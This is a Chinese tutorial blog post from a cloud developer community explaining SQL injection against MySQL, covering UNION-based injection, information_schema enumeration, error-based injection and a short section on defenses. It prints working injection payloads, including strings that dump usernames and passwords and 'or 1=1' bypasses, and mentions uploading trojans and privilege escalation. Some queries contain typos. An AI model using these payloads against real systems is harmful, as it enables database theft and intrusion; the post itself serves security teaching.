AI 助理
备案控制台
开发者社区 数据库 文章 正文

sql注入数据库原理详解

2022-10-27 146
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
云数据库 RDS MySQL,集群版 2核4GB 100GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
推荐场景:
学生管理系统数据库设计 搭建个人博客
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介: 作者主页:https://www.couragesteak.com/

1 介绍

SQL注入漏洞主要是由于,在请求的时候没有做严格的过滤,导致传入的语句被当做SQL语句被执行,从而导致数据库受损(被脱库、删除、甚至数据付权限沦陷)

2 一般步骤

  1. SQL注入点探测
    判断什么地方存在SQL注入点,通常在表单文章查询等与数据库有关操作的页面。

  2. 收集后台数据库信息
    不同的数据库的注入方法、函数各不相同,因此注入前要判断数据库的类型。
    如:
    特殊字符、单引号:让数据库返回错误
    函数:
    version()函数:MSQL专用

    1 and version()>0
  3. 猜测用户名和密码
    表名、字段名、字段数、用户名和密码。
  4. 查找 Web 后台管理入口
    可以使用 目录扫描工具
  5. 入侵and破坏
    登录后台:上传木马、篡改网页、窃取信息。
    进一步提权:入侵Web服务器和数据库服务器。

3 注入

测试数据

+---------------+----------------------------------+
| isbn          | title                            |
+---------------+----------------------------------+
| 9787302458210 | SQL Server 从入门到精通(第2版)    |
| 9787115496003 | 虚拟化技术应用与实践                |
| 9787302510109 | 算法设计与分析(第4版)             |
| 9787503442490 | 心灵密码                          |
| 9787503421884 | 雪狼                             |
| 9787539635835 | 龙头老太                          |
+---------------+----------------------------------+

3 函数

3.1 常用的系统函数

函数 作用
version() MySQL版本
user() 数据库用户名
database() 数据库名
@@datadir 数据库路径
@@version_complie_os 操作系统版本

3.2 字符串连接函数

三大法宝:concat(),group_concat(),concat_ws()

3.2.1 concat() 函数

特点:concat(str1,str2,...)
返回结果为连接参数产生的字符串,如果任何一个参数为NULL,则返回值为NULL,可以有一个或多个参数。

1. 不使用字符连接函数:

select isbn,title from books limit 1;
+---------------+----------------------------------+
| isbn          | title                            |
+---------------+----------------------------------+
| 9787302458210 | SQL Server 从入门到精通(第2版)    |
+---------------+----------------------------------+

2.使用示例
一般我们都要用一个字符将各个项隔开,便于数据的查看

select concat(isbn,',',title) from books limit 1;
+------------------------------------------------+
| concat(isbn,',',title)                         |
+------------------------------------------------+
| 9787302458210,SQL Server 从入门到精通(第2版)    |
+------------------------------------------------+

3.2.2 concat_ws() 函数

CONCAT_WS() 代表 CONCAT With Separator ,是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。如果分隔符为 NULL,则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。但是CONCAT_WS()不会忽略任何空字符串。 (然而会忽略所有的 NULL)。
特点:CONCAT_WS(separator,str1,str2,…)
使用示例
在这里插入图片描述

3.2.3 group_concat() 函数

GROUP_CONCAT函数返回一个字符串结果,该结果由分组中的值连接组合而成。

select bid,author,group_concat(bid) from books where author in('金勇先','方兆祥 著') group by bid;

就不演示了,sql语句如同上面

4 注入

4.1 联合查询 union 注入

使用联合查询进行的前提是我们进行注入的页面必须有显示位。

1、使用union
payload:

v' union select username from member where id=1#%

select 必须有相同的列,且各列的数据也都相同,同时,每条 SELECT 语句中的列的顺序必须相同。
联合查询可先在链接最后添加 order by X 基于随意数字的注入,根据页面的返回结果来判断站点中的字段数目。

select bid,author from books union select username from users;

在这里插入图片描述
2、 payload:a' order by 4#%

select bid,author from books order by 4#%;

在这里插入图片描述

select bid,author from books order by 2#%;

在这里插入图片描述
3、得到主查询由三个字段后,我们用union来做一个sql拼接。
pauload

a' union selec database(),user(),version()#%
select bid,author,title from books union selec database(),user(),version();

这里没有测试通过

4.2 information_schema 注入

information_schema数据库是MySQL5.0系统自带的数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。

select group_concat(schema_name) from information_schema.schemata;

实际注入测试

5.2.1 获取所有数据库

类型:id=/wd=/name=

-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name) from information_schema.schemata

在这里插入图片描述

4.2.2 获取指定数据库的表

payload

a' union select table_schema ,table_name,3 from information_schema.tables where table_schema='library'
select bid,author,title from books union select table_schema ,table_name,3 from information_schema.tables where table_schema='library';

在这里插入图片描述

4.2.3 获取指定表的字段名

payload

a' union select table_name,column_name,3 from information_schema.columns where table_name='users'#%
select bid,author,title from books  union select table_name,column_name,3 from information_schema.columns where table_name='users';

在这里插入图片描述

4.2.4 获取字段值得内容

payload

 a' union select username ,password,3 from users#%
select bid,author,title from books union select username,password,3 from users;

在这里插入图片描述

4.3 基于报错信息注入

此方法是在页面没有显示位,但是 echomysql_error() 函数,在前端输出了错误信息的时候方能使用。
优点是注入速度快,缺点是语句较为复杂,而且只能用 limit 依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用 echomysql_error() 输出了错误信息时使用。常见的select/insert/update/delete 注入都可以使用报错方式来获取信息。

4.3.1 三个常用报错函数

updatexml(): 函数是MYSQL对XML文档数据进行查询和修改的XPATH函数
extractvalue() : 函数也是MYSQL对XML文档数据进行查询的XPATH函数.
floor(): MYSQL中用来取整的函数.

### 4.4 数字注入 ```css or 1=1 ``` ### 4.5 搜索注入 在搜索框搜索的时候,成为搜索型。 数字型与字符型注入最大区别:数字型不需要单引号闭合,而字符串类型需要单引号闭合。 ```css %xxx% or 1=1 #%' ``` ## 5 sql注入防御 1. 对输入进行严格的转义和过滤 2. 使用参数化(Parameterized):目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重! 参考文章: https://zhuanlan.zhihu.com/p/258032596 https://www.cnblogs.com/lcamry/p/5715634.html
文章标签:
云数据库 RDS MySQL 版
前端开发
SQL
关系型数据库
数据安全/隐私保护
MySQL
安全
数据格式
数据库
XML
关键词:
SQL数据库
SQL注入
SQL原理
sql注入数据库
相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
有勇气的牛排
目录
相关文章
以山向海
|
21天前
|
SQL 存储 关系型数据库
关系型数据库SQLserver基本 SQL 操作
【7月更文挑战第28天】
以山向海
30 4
小王老师呀
|
6天前
|
SQL 数据库 数据安全/隐私保护
SQL Server数据库Owner导致事务复制log reader job无法启动的解决办法
【8月更文挑战第14天】解决SQL Server事务复制Log Reader作业因数据库所有者问题无法启动的方法:首先验证数据库所有者是否有效并具足够权限;若非,使用`ALTER AUTHORIZATION`更改为有效登录名。其次,确认Log Reader使用的登录名拥有读取事务日志所需的角色权限。还需检查复制配置是否准确无误,并验证Log Reader代理的连接信息及参数。重启SQL Server Agent服务或手动启动Log Reader作业亦可能解决问题。最后,审查SQL Server错误日志及Windows事件查看器以获取更多线索。
小王老师呀
13 0
wljslmz
|
20小时前
|
Linux 数据库 数据安全/隐私保护
在Linux环境中利用T-SQL与Docker实现MSSQL数据库复制
【8月更文挑战第20天】
wljslmz
10 2
vohelon
|
2天前
|
SQL 关系型数据库 MySQL
SQL数据库和 SQLserver数据库
【8月更文挑战第19天】SQL数据库和 SQLserver数据库
vohelon
11 2
vohelon
|
2天前
|
SQL 存储 安全
SQL Server数据库创建
【8月更文挑战第19天】SQL Server数据库创建
vohelon
5 1
sunrr
|
21天前
|
SQL 安全 关系型数据库
SQL数据库操作
【7月更文挑战第31天】SQL数据库操作
sunrr
24 7
sunrr
|
22天前
|
SQL 存储 关系型数据库
SQL数据库
【7月更文挑战第30天】SQL数据库
sunrr
24 8
以山向海
|
23天前
|
SQL 存储 监控
关系型数据库SQLserver中使用 SQL Server Management Studio (SSMS)
【7月更文挑战第26天】
以山向海
57 9
以山向海
|
20天前
|
SQL 关系型数据库 数据库
关系型数据库SQL server数据操纵语言 (DML)
【8月更文挑战第1天】
以山向海
30 4
竹子爱熊猫
|
20天前
|
存储 SQL 关系型数据库
(六)MySQL索引原理篇:深入数据库底层揭开索引机制的神秘面纱!
《索引原理篇》它现在终于来了!但对于索引原理及底层实现,相信大家多多少少都有了解过,毕竟这也是面试过程中出现次数较为频繁的一个技术点。在本文中就来一窥`MySQL`索引底层的神秘面纱!
竹子爱熊猫
105 5

热门文章

最新文章

  • 1
    详解开源数据库审计平台Yearning
  • 2
    含PPT下载 | 李飞飞:如何看待数据库的未来?
  • 3
    数据库主从不一致,怎么解?
  • 4
    Exchange 2007数据库复制失败的修复方法
  • 5
    第十八章——基于策略的管理(1)——评估数据库属性
  • 6
    数据库数据类型
  • 7
    linux系统中MongoDB数据库安装及分片集群搭建
  • 8
    标记 (TAG) 您的 HBASE 数据库实例
  • 9
    解剖SQLSERVER 第十七篇 使用 OrcaMDF Corruptor 故意损坏数据库(译)
  • 10
    JDBC数据库编程
  • 1
    数据分享|SQL Server、Visual Studio、tableau对信贷风险数据ETL分析、数据立方体构建可视化
    58
  • 2
    如何避免SQL注入?
    53
  • 3
    MySQL SQL error: #1271 - Illegal mix of collations for operation ‘UNION‘
    74
  • 4
    利用 SQL 注入提取数据方法总结
    42
  • 5
    SQL 注入神器:jSQL Injection 保姆级教程
    190
  • 6
    DataWorks产品使用合集之DataWorks中,填写ODPS SQL任务中的参数和分区信息如何解决
    52
  • 7
    DataWorks产品使用合集之在DataWorks的数据开发模式中,在presql和postsql中支持执行多条SQL语句如何解决
    118
  • 8
    30个业务场景的SQL优化
    290
  • 9
    【MySQL】:探秘主流关系型数据库管理系统及SQL语言
    150
  • 10
    MaxCompute产品使用合集之大数据计算MaxCompute即使用相同的SQL语句在DataWorks和Tunnel上执行,结果却不同,如何解决
    38

    • 相关课程

    更多
  • 如何在 PolarDB-X 中优化慢 SQL
  • SQL完全自学手册
  • SQL Server on Linux入门教程
  • SQL入门与实践
  • 数据库及SQL/MySQL基础
  • SQL进阶及查询

    • 相关电子书

    更多
  • SQL Server在电子商务中的应用与实践
  • GeoMesa on Spark SQL
  • 原生SQL on Hadoop引擎- Apache HAWQ 2.x最新技术解密malili

    • 相关实验场景

    更多
  • 数据库实验室挑战任务-高级任务
  • 数据库实验室挑战任务-中级任务
  • 数据库实验室挑战任务-初级任务
  • 阿里云数据库产品实验室
  • SQL的增删改查及函数应用
  • MongoDB数据库入门
    • 下一篇
    【案例实战】SpringBoot整合阿里云文件上传OSS